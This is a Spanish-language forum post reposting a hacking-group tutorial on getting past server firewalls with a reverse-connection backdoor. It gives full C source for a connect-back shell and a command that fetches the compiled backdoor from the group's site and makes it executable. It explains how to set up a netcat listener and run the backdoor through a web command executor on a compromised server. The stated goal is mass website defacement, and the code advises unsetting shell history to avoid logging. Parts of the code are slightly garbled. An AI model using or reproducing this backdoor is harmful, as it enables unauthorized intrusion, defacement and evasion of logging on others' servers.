send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Shell con Firewall

  • 0 Respuestas
  • 1795 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado dracko.rx

  • *
  • Underc0der
  • Mensajes: 247
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • http://rax0rnet.blogspot.com/
    • Email
« en: Febrero 24, 2010, 02:51:35 pm »
############################################################################

sh-2.05# ./ Escrito por Status-x [ phr4xz@gmail.com ] - Mexico

############################################################################

********************************************** ******************************

[ Contenido ]

[ 1 ] .- Introduccion.............................................. Status-x

[ 2 ] .- Backdoors................................................. Status-x

[ 3 ] .- Conexion Reversa.......................................... Status-x

[ 4 ] .- Despedida................................................. Status-x

****************************************************************************

########################################## ##################################

sh-2.05# ./ Introduccion

############################################################################

Que onda, seguramente muchas veces a algunos ustedes el backdoor de su

preferencia no les conecta, bien esto significa que el servidor tiene fire

wall y por lo tanto no acepta conexiones por los distintos puertos que los

backdoors usan, es por eso que veremos como conectarnos aunque el servidor

tenga firewall, para eso utilizaremos un backdoor de conexion reversa que es

mucho mas amigable que trabajar con netcat :)

############################################################################

sh-2.05# ./ Backdoors

############################################################################

r0nin, vaya backdoor jejejeje seguramente muchos solo conocen ese, se han

quedado estancados ahi, al leer un tuto y hacer su primer deface ya son

elites y van presumiendo por distintas webs que saben hacer un deface sin

embargo creo que solo se conforman con hacer su index

------------------------------
echo Yo soy hax0r >index.html
------------------------------

Bien, un backdoor como su nombre lo indica en español es una aplicacion que

nos abrira una puerta trasera por la cual entrar, similar en funcionamiento

a los clasicos troyanos, hay distintos backdoors y hay algunos que solo fun

cionan con determinado OS, esto quiere decir que para cada Os podria haber

un backdoor, en este caso usaremos un backdoor normal cuyo autor es

Innocent Boys de Brazil.

Comenzaremos haciendo que el backdoor haga su funcion abrirnos un puerto

,bien en este caso el backdoor me habre una puerta en el 9865

En un ejecutor de comandos correremos el backdoor:

---------------------------------------------------------------------------
You are not allowed to view links. Register or Login
?&cmd=cd /tmp;./backdoor

Innocent Boys Backdoor

Binding the 9865
OK, pid = 30584
---------------------------------------------------------------------------

Ahora nos trataremos de conectar por el putty o con telnet:

-----------------------------------------------

telnet:localhost:9865

-----------------------------------------------

S in embargo vemos que no nos da la shell, esto quiere decir que tendremos

que echar mano de un backdoor especial que sirve para hacer conexion reversa

y nos conectara aunque el servidor tenga firewall :)

############################################################################

sh-2.05# ./ Conexion Reversa

############################################################################

Para conectarnos usaremos un backdoor de conexion reversa, llamado ConnectBack

Backdoor, :) a continuacion su codigo fuente

------------------------ COTAR AQUI ---------------------------------
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
int main(int argc, char **argv) {
char *host;
int port = 80;
int f; int l;
int sock;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
char msg[ ] = "Connect Back Shell "
"Issue \"export TERM=xterm; exec bash -i\" "
"For More Reliable Shell. "
"Issue \"unset HISTFILE; unset SAVEHIST\" "
"For Not Getting Logged. (; ";
printf("Connect Back Backdoor ");
if (argc < 2 || argc > 3) {
printf("Usage: %s [Host] <port> ", argv[0]);
return 1;
}
printf("
  • Dumping Arguments ");

l = strlen(argv[1]);
if (l <= 0) {
printf("[-] Invalid Host Name ");
return 1;
}
if (!(host = (char *) malloc(l))) {
printf("[-] Unable to Allocate Memory ");
return 1;
}
strncpy(host, argv[1], l);
if (argc == 3) {
port = atoi(argv[2]);
if (port <= 0 || port > 65535) {
printf("[-] Invalid Port Number ");
return 1;
}
}
printf("
  • Resolving Host Name ");

he = gethostbyname(host);
if (he) {
memcpy(&ia.s_addr, he->h_addr, 4);
} else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
printf("[-] Unable to Resolve: %s ", host)
return 1;
}
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(port);
printf("
  • Connecting... ");

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Socket Error ");
return 1;
}
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
printf("[-] Unable to Connect ");
return 1;
}
printf("
  • Spawning Shell ");

f = fork( );
if (f < 0) {
printf("[-] Unable to Fork ");
return 1;
} else if (!f) {
write(sock, msg, sizeof(msg));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "shell", NULL);
close(sock);
return 0;
}
printf("
  • Detached ");

return 0;
}0; }
------------------------------------------------------------------------

Este backdoor nos permitira conectarnos aunque el server tenga firewall

sin embargo el backdoor solo funcionara si tenemos una conexion por

Dial Up ya que he testeado con ADSL y no funciona ;)

Para descargar el backdoor ya compilado:

-------------------------------
You are not allowed to view links. Register or Login
-------------------------------

Bien empezemos:

En nuestro ejecutor de comandos nos cambiaremos a un directorio con

permisos de escritura, ya explique como se hace eso :), y despues

subiremos el backdoor :) y le daremos permisos 777

----------------------------------------------------

cd /dir/;wget defacersmexico.org/bd/dc; chmod 777 dc

----------------------------------------------------

La siguiente herramienta que utilizaremos para poder conectarnos

al servidor sera netcat, que servira como programa escucha y ahi

recibiremos la shell.

En dado caso que estemos bajo Windows haremos lo siguiente en

nuestra linea de comandos :) ejecutaremos nuestro netcat:

------------------------------------------

Microsoft Windows XP [Versión 5.1.2600]
(c) Copyright 1985-2001 Microsoft Corp. <-------ejecutamos Netcat

C:\Documents and Settings\Status-x>nc
Cmd line:

-------------------------------------------

Nos saldra algo como Cmd line: aqui especificaremos el comando

para que Netcat se ponga a la escucha y podamos obtener la shell :)

el comando que pondremos sera:

--------------------
-vv -l -p puerto
--------------------

Y si lo hicimos bien en el netcat nos saldra lo siguiente:

-------------------------------------------

C:\Documents and Settings\Status-x>nc
Cmd line: -vv -l -p 80
listening on [any] 80 ...

-------------------------------------------

cabe mencionar que tendremos que desactivar nuestros firewall para

que podamos recibir la shell, esto involucra tambien desactivar

el servidor de seguridad de internet de microsoft, esto se hace asi:

------------------------------------------------------------------
Inicio > Conexiones de red > Tu Conexion > Propiedades > Avanzadas
------------------------------------------------------------------

Y ahi desactivas la palomita de hasta arriba

Entonces ya tenemos nuestro netcat a la escucha y lo unico que falta

es obtener la shell :), entonces nos vamos a nuestro ejecutor de

comandos y ejecutamos el backdoor:

--------------------
./dc

usage: ./dc <ip> <port>

--------------------

Ahora solo nos queda sustituir los valores que nos piden

IP - Tu ip

Port - Puerto que hayas especificado en el Netcat

En este caso yo especifique el puerto 80 y procedemos a ejecutarlo :)

-----------------------

./dc 200.145.23.34 80
|
| Tu IP
|
Backdoor Puerto

-----------------------

Si lo hicimos todo bien en el ejecutor de comandos nos debe salir algo como esto:

---------------------------
Connect Back Backdoor

  • Dumping Arguments
  • Resolving Host Name
  • Connecting...
  • Spawning Shell
  • Detached


-----------------------------

y en el Netcat debe de haber aparecido la Shell!!!!!

Sin embargo si aparece esto:

-------------------------
Connect Back Backdoor

  • Dumping Arguments
  • Resolving Host Name
  • Connecting...
  • [-] Unable to Connect
    -------------------------

    Quiere decir que tu red no acepta este tipo de conexion o que hiciste algo mal

    , asi que checa tu IP, puerto, que el netcat este a la escucha, etc :)

    Recomiendo utilizar puertos de servicios que no sean sospechosos y con mayor

    probabilidad de que te conecten como: 80, 25, 15 ;)

    ############################################################################

    sh-2.05# ./ Despedida

    ############################################################################

    Bueno pues un tutorial mas, que estoy seguro les sera de ayuda a muchisimas

    personas que creian perdido su mass defacement :) jjejejejeje, espero que

    les haya gustado el tutorial si tienen dudas ya saben mi

    mail: phr4xz@gmail.com

    MSN: phr4xz@gmail.com

    web:
You are not allowed to view links. Register or Login

Bye a todos ;)

un Saludo especial a Data Cha0s y Command Tribulation por facilitar las

herramientas y la shell en que fue testeado el backdoor ;)

############################################################################

sh-2.05b$ ./ exit

Copyright 2005 Defacers Mexico - No modificar sin permiso de su autor

Si publicas este texto en tu sitio por favor no lo modifiques ;)

############################################################################
Venta de diseños - Contactar por MP

You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!



Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdoorizar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 2175
Último mensaje Julio 17, 2012, 12:35:31 am
por hdbreaker
Shell-Save_1.0 [Administra de manera mas eficiente tus webshells online]

Iniciado por q3rv0

Respuestas: 9
Vistas: 3708
Último mensaje Abril 14, 2013, 05:34:46 am
por s3cur1tyr00t
Subir Shell a través de Inyección SSI (Server-side include)

Iniciado por CalebBucker

Respuestas: 7
Vistas: 3523
Último mensaje Junio 23, 2012, 08:44:07 am
por s3cur1tyr00t
Una noche con PrestaShop [anécdota][shell-upload]

Iniciado por Xt3mP

Respuestas: 5
Vistas: 4252
Último mensaje Julio 18, 2012, 06:39:49 pm
por Xt3mP
HTTP METHODS: Subiendo Shell mediante PUT

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2168
Último mensaje Febrero 24, 2010, 03:07:58 pm
por dracko.rx